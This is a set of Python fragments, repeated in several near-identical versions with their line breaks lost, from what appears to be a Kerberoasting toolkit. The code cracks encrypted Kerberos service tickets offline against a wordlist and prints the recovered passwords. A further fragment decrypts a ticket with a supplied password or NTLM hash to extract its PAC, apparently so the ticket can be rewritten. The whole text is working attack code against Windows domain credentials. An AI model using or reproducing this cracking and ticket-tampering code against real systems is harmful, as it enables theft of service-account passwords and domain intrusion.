def crack(wordlist, enctickets): toremove = [] while enctickets: try: word = wordlist.get() if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE': break print "\ntrying %s" % word.encode('utf-8').decode( 'utf-8-sig').strip() for et in enctickets: kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0]) if kdata: print 'found password for ticket %i: %s File: %s' % ( et[1], word, et[2]) toremove.append(et) # if len(et): # print str(et[0]) for et in toremove: try: enctickets.remove(et) except: return if not enctickets: return except: continue
def crack(wordlist, enctickets): toremove = [] while enctickets: word = wordlist.get() #print "trying %s" % word for et in enctickets: kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0]) if kdata: print('found password for ticket %i: %s File: %s' % (et[1], word, et[2])) toremove.append(et) for et in toremove: try: enctickets.remove(et) except: return if not enctickets: return
def crack(wordlist, enctickets): toremove = [] while enctickets: word = wordlist.get() if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE': break #print "trying %s" % word for et in enctickets: kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0]) if kdata: print 'found password for ticket %i: %s File: %s' % (et[1], word, et[2]) toremove.append(et) for et in toremove: try: enctickets.remove(et) except: return if not enctickets: return
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False, default=False, help='verbose') parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False, default=False, help='show debug messages') #parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2, # metavar='2', type=int, # help='message type, from RAM it is 2 (This should not need to be changed)') args = parser.parse_args() # make sure a password or hash is provided if args.nthash == None and args.password != None: key = kerberos.ntlmhash(args.password) elif args.nthash != None: key = args.nthash.decode('hex') else: print("You must provide either the password (-p) or the hash (-n)") exit(1) # read the ticket from the file fullraw = args.infile.read() args.infile.close() # do the rewrite #newticket = rewriteticket(key, fullraw, debug=args.debug, verbose=args.verbose) pac = getpac(key, fullraw) pacobj = PAC.PAC(pac)
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False, default=False, help='verbose') parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False, default=False, help='show debug messages') #parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2, # metavar='2', type=int, # help='message type, from RAM it is 2 (This should not need to be changed)') args = parser.parse_args() # make sure a password or hash is provided if args.nthash == None and args.password != None: key = kerberos.ntlmhash(args.password) elif args.nthash != None: key = args.nthash.decode('hex') else: print "You must provide either the password (-p) or the hash (-n)" exit(1) # read the ticket from the file fullraw = args.infile.read() args.infile.close() # do the rewrite #newticket = rewriteticket(key, fullraw, debug=args.debug, verbose=args.verbose) pac = getpac(key, fullraw) pacobj = PAC.PAC(pac)
((decoder.decode(data)[0][2][0][3][2]).asOctets(), i, f)) i += 1 elif data[:2] == '6d': for ticket in data.strip().split('\n'): enctickets.append(((decoder.decode( ticket.decode('hex'))[0][4][3][2]).asOctets(), i, f)) i += 1 if len(enctickets): print("Cracking %i tickets..." % len(enctickets)) else: print("No tickets found") sys.exit() # load wordlist for w in args.wordlistfile: word = w.decode('utf-8').strip() hash = kerberos.ntlmhash(word) for et in enctickets: kdata, nonce = kerberos.decrypt(hash, 2, et[0]) if kdata: print('found password for ticket %i: %s File: %s' % (et[1], word, et[2])) enctickets.remove(et) if len(enctickets) == 0: print('Successfully cracked all tickets') sys.exit() if len(enctickets): print("Unable to crack %i tickets" % len(enctickets))